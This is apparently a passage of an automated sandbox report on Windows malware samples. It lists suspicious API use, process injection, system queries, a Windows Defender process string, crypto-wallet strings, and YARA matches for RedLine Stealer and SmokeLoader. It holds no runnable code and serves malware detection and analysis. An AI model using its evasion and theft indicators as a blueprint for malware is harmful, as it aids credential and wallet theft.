Source: 17.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 17.0.DB56.exe.aa0000.0.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 17.0.DB56.exe.aa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 17.0.DB56.exe.aa0000.1.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 17.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 18.0.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 18.0.DB56.exe.aa0000.1.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.0.DB56.exe.aa0000.13.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 18.0.DB56.exe.aa0000.13.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.0.DB56.exe.400000.6.unpack, NativeHelper.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.0.DB56.exe.aa0000.3.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.0.DB56.exe.aa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 18.2.DB56.exe.aa0000.1.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.2.DB56.exe.aa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Source: 18.0.DB56.exe.aa0000.2.unpack, redaeHegasseMledoMecivreSmetsyS1587.cs Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 18.0.DB56.exe.aa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs Reference to suspicious API methods: ('r76RP97uO', 'GetProcAddress@kernel32'), ('grYvFMse6', 'LoadLibrary@kernel32')
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Process created: C:\Users\user\AppData\Local\Temp\DB56.exe C:\Users\user\AppData\Local\Temp\DB56.exe
Source: explorer.exe, 00000005.00000000.372830978.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.373972184.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.383787188.00000000083E9000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.404165082.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.390027597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396181153.00000000083E9000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.414837754.00000000083E9000.00000004.00000001.sdmp, 4924.exe, 00000017.00000002.621834353.0000000000D80000.00000002.00020000.sdmp, 8CE5.exe, 00000018.00000002.619447832.0000000000C80000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.372574015.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.372830978.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.389389108.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.404165082.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.390027597.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.403537957.00000000008B8000.00000004.00000020.sdmp, 4924.exe, 00000017.00000002.621834353.0000000000D80000.00000002.00020000.sdmp, 8CE5.exe, 00000018.00000002.619447832.0000000000C80000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.372830978.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.404165082.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.390027597.0000000000EE0000.00000002.00020000.sdmp, 4924.exe, 00000017.00000002.621834353.0000000000D80000.00000002.00020000.sdmp, 8CE5.exe, 00000018.00000002.619447832.0000000000C80000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000005.00000000.372830978.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.404165082.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.390027597.0000000000EE0000.00000002.00020000.sdmp, 4924.exe, 00000017.00000002.621834353.0000000000D80000.00000002.00020000.sdmp, 8CE5.exe, 00000018.00000002.619447832.0000000000C80000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Users\user\AppData\Local\Temp\DB56.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Users\user\AppData\Local\Temp\DB56.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DB56.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4924.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4924.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4924.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4924.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4924.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4924.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4924.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\4924.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: DB56.exe, 00000012.00000002.622325336.0000000001046000.00000004.00000020.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information:

Yara detected RedLine Stealer
Source: Yara match File source: 23.2.4924.exe.21e6516.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2610000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2440000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2440ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.21e562e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.4924.exe.6a4528.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.21e562e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DB56.exe.3e84c30.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.DB56.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.21e6516.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2440ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DB56.exe.3e84c30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.4924.exe.6a4528.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2610000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.625266789.0000000002610000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.523427669.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.522921861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.524651517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.578493613.00000000006A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.524218924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.532354864.0000000003D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DB56.exe PID: 3496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB56.exe PID: 4272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4924.exe PID: 6316, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 0.2.fw8ex1BNek.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.fw8ex1BNek.exe.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.acgvitw.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.acgvitw.640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.fw8ex1BNek.exe.640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.acgvitw.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.468340916.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.427536379.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.360531074.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: ElectrumE#
Source: DB56.exe String found in binary or memory: Y2Kk37O/WKAGtjb5HPg3kTSKGyi3Ne9K0dYz2mIiUDEtQ3a57xnmJAXxAx4SIyXYjnpCTZIvModiocW4XNebcAphSLesdCH4NZBUKTm0ABNvi/NeDHIfaudRy5SDghH3Wo
Source: DB56.exe, 00000012.00000002.626088156.0000000002E94000.00000004.00000001.sdmp String found in binary or memory: ExodusE#
Source: 4924.exe, 00000017.00000002.630615314.0000000002B07000.00000004.00000001.sdmp String found in binary or memory: EthereumE#
Source: DB56.exe String found in binary or memory: set_UseMachineKeyStore
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: DB56.exe PID: 4272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4924.exe PID: 6316, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match File source: 23.2.4924.exe.21e6516.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2610000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2440000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2440ee8.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.21e562e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.4924.exe.6a4528.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.21e562e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DB56.exe.3e84c30.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.DB56.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.21e6516.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.0.DB56.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2440ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2440000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.DB56.exe.3e84c30.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.3.4924.exe.6a4528.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.4924.exe.2610000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.622456667.00000000021A5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.617991454.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.625266789.0000000002610000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.523427669.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.522921861.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.524651517.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.578493613.00000000006A4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.524218924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.624238934.0000000002440000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.633124266.0000000003ABA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.532354864.0000000003D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DB56.exe PID: 3496, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DB56.exe PID: 4272, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4924.exe PID: 6316, type: MEMORYSTR
Yara detected SmokeLoader
Source: Yara match File source: 0.2.fw8ex1BNek.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.fw8ex1BNek.exe.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.acgvitw.630e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.acgvitw.640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.fw8ex1BNek.exe.640000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.acgvitw.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.481080184.0000000000661000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.405588327.0000000002E51000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.427646956.00000000007C1000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.468340916.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.481062049.0000000000640000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.427536379.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.360531074.0000000000640000.00000004.00000001.sdmp, type: MEMORY